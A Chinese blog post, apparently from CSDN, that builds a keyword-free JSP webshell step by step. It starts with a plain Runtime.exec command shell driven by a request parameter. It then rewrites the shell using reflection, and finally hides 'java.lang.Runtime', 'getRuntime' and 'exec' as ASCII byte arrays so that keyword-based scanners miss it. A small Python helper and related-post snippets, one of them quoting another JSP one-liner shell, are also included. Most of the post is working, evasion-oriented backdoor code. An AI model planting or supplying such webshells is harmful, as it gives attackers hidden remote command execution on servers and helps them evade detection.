简单的jsp无关键字一句话

已于 2023-05-17 23:29:31 修改
阅读量560 收藏
点赞数
文章标签: java web安全
于 2022-05-16 23:37:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40131760/article/details/124810798
版权

通过ascii码与字符之间的转换,加上通过反射加载类,实现无关键字一句话

py脚本script_str2ascii

首先写一个简单的py脚本,转换命令为byte数组

cmd=input("input code")
arr=[]
for char in cmd:
    arr.append(ord(char))
print(arr)
开始

接下来找一个简单的小马,进行改造

<%
    String cmd = request.getParameter("cmd");
    StringBuffer res = new StringBuffer();
    //加一个系统的判断
    String os = System.getProperty("os.name");
    boolean isWin = false;
    BufferedReader bufferedReader;
    if (os != null && os.toLowerCase().startsWith("windows")) {
        isWin = true;
    }
    try {
        if (isWin == false) {
            bufferedReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream()));
        } else {
            bufferedReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec("cmd /C " + cmd).getInputStream()));
        }

        String len;
        while ((len = bufferedReader.readLine()) != null) {
            res.append(len + "\n");
        }

    } catch (Exception e) {
        res.append(e.getMessage());

    }
   out.print("<pre>" + res.toString() + "</pre>");
%>
通过反射改变获取类并执行的方式

主要目的是将runtime相关的类和函数通过反射进行修改

<%Class<?> aClass = Class.forName("java.lang.Runtime");//这个forName加载类的时候会执行类内的静态代码块
    Method method = aClass.getMethod("getRuntime");
    Object o = method.invoke(null);//这里获取到runtime类
    Method method1 = aClass.getMethod("exec", String.class);
    method1.invoke(o,"calc");
%>

有两点值得说一下
1.使用forName加载类会执行静态代码块,由于Runtime类是单例设计模式,所以执行静态代码块之后getRuntime方法才能拿到Runtime类的实例
2.method.invoke(null)可以传递null的原因是该方法为静态方法,可以这样理解---------静态方法会给所有实例共享,所以不需要传递哪个具体的实例进去,于是传递个null就行了

通过反射加载runtime类的方式可行,并且成功弹出了计算器

接下来通过ascii数组,替换其中比较敏感的字符串

上面那个小马里面别的不关键的东西懒得写了…

这里可以使用byte数组,原因是当前涉及到的字符串中的所有字符ascii码均在127以下

加入byte数组

通过byte数组修饰以下关键字

<%
    byte[] a={106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 82, 117, 110, 116, 105, 109, 101};
    Class<?> aClass = Class.forName(new String(a));//这个forName加载类的时候会执行类内的静态代码块
    byte[] b={103, 101, 116, 82, 117, 110, 116, 105, 109, 101};
    Method method = aClass.getMethod(new String(b));
    Object o = method.invoke(null);//这里获取到runtime类
    byte[] c={101, 120, 101, 99};
    Method method1 = aClass.getMethod(new String(c), String.class);
    method1.invoke(o,request.getParameter("haha"));
%>
blueSatchel
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
JSP一句话代码
05-15
JSP一句话代码
java安全——jsp一句话木马
最新发布
m0_59598029的博客
02-21 1234
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
超级有影响力霸气的Java面试题大全文档
07-18
超级有影响力的Java面试题大全文档 1.抽象: 抽象就是忽略一个主题中与当前目标无关的那些方面,以便更充分地注意与当前目标有关的方面。抽象并不打算了解全部问题,而只是选择其中的一部分,暂时不用部分细节。抽象包括两个方面,一是过程抽象,二是数据抽象。 2.继承:  继承是一种联结类的层次模型,并且允许和鼓励类的重用,它提供了一种明确表述共性的方法。对象的一个新类可以从现有的类中派生,这个过程称为类继承。新类继承了原始类的特性,新类称为原始类的派生类(子类),而原始类称为新类的基类(父类)。派生类可以从它的基类那里继承方法和实例变量,并且类可以修改或增加新的方法使之更适合特殊的需要。 3.封装:  封装是把过程和数据包围起来,对数据的访问只能通过已定义的界面。面向对象计算始于这个基本概念,即现实世界可以被描绘成一系列完全自治、封装的对象,这些对象通过一个受保护的接口访问其他对象。 4. 多态性:  多态性是指允许不同类的对象对同一消息作出响应。多态性包括参数化多态性和包含多态性。多态性语言具有灵活、抽象、行为共享、代码共享的优势,很好的解决了应用程序函数同名问题。 5、String是最基本的数据类型吗?  基本数据类型包括byte、int、char、long、float、double、boolean和short。  java.lang.String类是final类型的,因此不可以继承这个类、不能修改这个类。为了提高效率节省空间,我们应该用StringBuffer类 6、int 和 Integer 有什么区别  Java 提供两种不同的类型:引用类型和原始类型(或内置类型)。Int是java的原始数据类型,Integer是java为int提供的封装类。Java为每个原始类型提供了封装类。 原始类型 封装类 boolean Boolean char Character byte Byte short Short int Integer long Long float Float double Double  引用类型和原始类型的行为完全不同,并且它们具有不同的语义。引用类型和原始类型具有不同的特征和用法,它们包括:大小和速度问题,这种类型以哪种类型的数据结构存储,当引用类型和原始类型用作某个类的实例数据时所指定的缺省值。对象引用实例变量的缺省值为 null,而原始类型实例变量的缺省值与它们的类型有关。 7、String 和StringBuffer的区别  JAVA平台提供了两个类:String和StringBuffer,它们可以储存和操作字符串,即包含多个字符的字符数据。这个String类提供了数值不可改变的字符串。而这个StringBuffer类提供的字符串进行修改。当你知道字符数据要改变的时候你就可以使用StringBuffer。典型地,你可以使用 StringBuffers来动态构造字符数据。 8、运行时异常与一般异常有何异同?  异常表示程序运行过程中可能出现的非正常状态,运行时异常表示虚拟机的通常操作中可能遇到的异常,是一种常见运行错误。java编译器要求方法必须声明抛出可能发生的非运行时异常,但是并不要求必须声明抛出未被捕获的运行时异常。 9、说出Servlet的生命周期,并说出Servlet和CGI的区别。  Servlet被服务器实例化后,容器运行其init方法,请求到达时运行其service方法,service方法自动派遣运行与请求对应的doXXX方法(doGet,doPost)等,当服务器决定将实例销毁的时候调用其destroy方法。 与cgi的区别在于servlet处于服务器进程中,它通过多线程方式运行其service方法,一个实例可以服务于多个请求,并且其实例一般不会销毁,而CGI对每个请求都产生新的进程,服务完成后就销毁,所以效率上低于servlet。 10、说出ArrayList,Vector, LinkedList的存储性能和特性  ArrayList 和Vector都是使用数组方式存储数据,此数组元素数大于实际存储的数据以便增加和插入元素,它们都允许直接按序号索引元素,但是插入元素要涉及数组元素移动等内存操作,所以索引数据快而插入数据慢,Vector由于使用了synchronized方法(线程安全),通常性能上较ArrayList差,而LinkedList使用双向链表实现存储,按序号索引数据需要进行前向或后向遍历,但是插入数据时只需要记录本项的前后项即可,所以插入速度较快。 11、EJB是基于哪些技术实现的?并说出SessionBean和EntityBean的区别,StatefulBean和StatelessBean的区别。 EJB包括Ses
JSP页面打印
lanselianyu的博客
04-25 944
由JS实现打印功能 页面设置好打印的范围 JS通过获取页面内容 调用print()方法打印 function doPrint(){ bdhtml = window.document.body.innerHTML; sprnstr = “”; eprnstr = “”; prnhtml=bdhtml.substr(bdhtml.indexOf(sprnstr)+17); prnhtml=prnhtm...
Java安全-Java Web后门学习 Jsp 一句话分析
Love&Share
05-03 2313
文章目录Java Web后门一句话木马反射调用类加载(冰蝎马实现方式)ELSE参考 Java Web后门 Java 是强类型语言,不能够像 PHP 那样利用字符串组合当作系统函数使用 Java 中常用的命令执行函数 java.lang.Runtime.exec() java.lang.ProcessBuilder.start() 一句话木马 最简单jsp 一句话木马 <% Runtime.getRuntime().exec(request.getParameter("i"));%> .
JSP以及相关使用
weixin_47543906的博客
12-04 2307
JSP(全称:Java Server Pages):Java 服务端页面。==是一种动态的网页技术,其中既可以定义 HTML、JS、CSS等静态内容,还可以定义 Java代码的动态内容,也就是 JSP = HTML + Java。 之前学到了Servlet的返回html页面,我们了解到这种只使用Servlet的方式太繁琐了,所以加入JSP,改为使用Servlet+JSP的方式。 JSP 作用:简化开发,避免了在Servlet中直接输出HTML标签。
关于在同一张jsp里面根据不同的按钮点击实现不同字段显示
z19950712的博客
05-10 2324
场景再现: 需求为实现红框中所有字段的撰取效果; 传统做法:新建十几张不同的jsp+不同的存储过程;这样能简单实现,但是一旦碰到后期修改就需要花费很长时间进行维护; 我们的解决方法:首先,为我们每个按钮添加跳转方法的同时,加上标记属性,QTAG,当QTAG=1时,显示管理费字段,当QTAG=2时,显示XXX字段; function GL_F() { $("form:eq(0)") .attr( "action", "loadDataDAOP.action?reloadNa
jsp一句话总结
weixin_45486362的博客
06-25 5334
** 基本原理 ** 由于Java中没有所谓的eval函数,无法对直接传递的代码进行解析执行。所以不管是蚁剑还是菜刀对于JSP的shell一直是采用custom模式,即把要执行的代码提前写在shell中,然后每次只需要传递要调用的函数名以及对应的参数即可。 虽然可以实现相应的功能,但是带来一个问题就是shell体积非常巨大。菜刀的jsp脚本有7kb大小,蚁剑的jsp custom脚本即使去掉注释后还有17k之多,用起来非常的不方便。 冰蝎的作者rebeyond大佬在文章 利用动态二进制加密实现新型一句话木马
java面试宝典
02-28
18、两个对象值相同(x.equals(y) == true),但却可有不同的hash code,这句话对不对? 9 19、是否可以继承String 类? 9 20、以下二条语句返回值为true 的有: 10 21、当一个对象被当作参数传递到一个方法后,此方法可...
java 面试题 总结
09-16
但通常情况下,由于Java Bean是被容器所创建(如Tomcat)的,所以Java Bean应具有一个无参的构造器,另外,通常Java Bean还要实现Serializable接口用于实现Bean的持久性。Java Bean实际上相当于微软COM模型中的本地...
千方百计笔试题大全
11-30
18、两个对象值相同(x.equals(y) == true),但却可有不同的hash code,这句话对不对? 9 19、是否可以继承String 类? 9 20、以下二条语句返回值为true 的有: 10 21、当一个对象被当作参数传递到一个方法后,此方法可...
C语言资料大全1.0
08-03
1.不要看到别人的回复第一句话就说:给个代码吧!你应该想想为什么。当你自己想 出来再参考别人的提示,你就知道自己和别人思路的差异。 2.初学者请不要看太多太多的书那会误人子弟的,先找本系统的学,很多人用了很...
jsp一句话小马
weixin_42786460的博客
09-09 634
jsp一句话小马
JSP基础和内置对象编程java web实验
ch_musk的博客
04-14 1185
1.新建一个JSP页面,该页面向浏览器输出一句”Hello JSP”,要求采用三种方式输出(模板文本输出/out.println方法输出/JSP表达式输出),并观察该JSP页面所生成Servlet,解释页面内容在Servlet中的对应角色; 源码: <%@pagelanguage="java"import="java.util.*"pageEncoding="utf...
jsp一句话
云守护的专栏
03-25 9699
<% try { response.setHeader("content-type","text/html;charset=UTF-8"); String cmd = request.getParameter("k8"); String path = application.getRealPath(request.getRequestURI()); String dir = ne
蚁剑高级模块开发
悦分享
08-04 1109
蚁剑进行二次开发的一些技巧与经验。
jsp页面中点击编辑按钮,显示input边框,可编辑,点击保存按钮,输入框消失,不可编辑,并将文本框中的内容保存到数据库中
爱学习的大雄的博客
12-07 2941
寻找的资料 一、 默认readonly不允许编辑。点击编辑的时候加上边框样式,去掉readonly属性 <style>.readonly input{border:none}</style> <div id="dvInput" class="readonly"> text1:<input type="text" readonly value="text1" /><br /> text2:<input type="text" readon
怎么使用bert搜索一句话关键字
08-16
你可以使用 BERT 模型预测一句话中最可能出现的关键字。首先,你需要准备好训练好的 BERT 模型和输入数据,然后使用如下步骤进行搜索: 1. 将输入数据转换成 BERT 能够处理的格式,例如将文本转换成 BERT 输入所需的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值